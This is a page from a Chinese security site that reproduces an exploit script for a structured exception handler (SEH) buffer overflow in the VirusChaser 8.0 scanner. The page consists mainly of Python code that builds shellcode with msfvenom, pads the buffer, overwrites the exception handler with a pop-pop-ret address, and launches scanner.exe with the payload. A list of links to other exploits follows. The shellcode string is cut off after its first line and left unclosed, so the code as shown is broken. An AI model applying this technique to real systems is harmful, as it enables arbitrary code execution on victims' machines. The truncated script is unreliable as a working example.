首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
VirusChaser 8.0 - Buffer Overflow (SEH)
来源:0x41Li.D@gmail.com 作者:0x41Li 发布时间:2017-04-18  
# Exploit Title: Virus Chaser 8.0 - Scanner component, SEH Overflow
# Date: 14 April 2017
# Exploit Author: 0x41Li (0x41Li.D@gmail.com)
# Vendor Homepage: https://www.viruschaser.com/
# Software Link: https://www.viruschaser.com/download/VC80b_32Setup.zip
# Tested on: Windows 7 (Universal)
import os
from struct import pack
## msfvenom -a x86 --platform Windows -p windows/exec cmd=calc -b '\x00\x0d\x0a\x09\x22' -f c   # x86/shikata_ga_nai succeeded with size 216  ## BADCHARS = \x00\x0d\x0a\x09 AVOIDED = \x22 = " (Cut the buffer)
shellcode= ("\xbe\x7a\x1f\x2d\x97\xda\xd5\xd9\x74\x24\xf4\x5a\x33\xc9\xb1"
junk = "A"*688
jmp ="\xeb\x0b\x41\x41"  ## JMP 0B
ret = pack('<L',0x10010c81)  #pop ECX #pop ESI #RET [sgbidar.dll]  (magic addr)
nop = "\x90"*24
payload = junk + jmp + ret + nop + shellcode
print payload
os.system("C:\\\"Program Files\\VirusChaser\\scanner.exe\" \"" + payload + "\"")
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
·Linux Kernel 4.8.0 UDEV < 232
·WinSCP 5.9.4 - 'LIST' Denial o
·Huawei HG532n Command Injectio
·Mantis Bug Tracker 1.3.0/2.3.0
·Alienvault OSSIM/USM 5.3.4/5.3
·Microsoft Windows - Uncredenti
·Microsoft Windows Kernel - 'wi
·Tenable Appliance < 4.5 - Unau
·PonyOS 4.0 - 'fluttershy' LD_L
·pinfo 0.6.9 - Local Buffer Ove
·GNS3 Mac OS-X 1.5.2 - 'ubridge
·Microsoft Word - .RTF Remote C
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved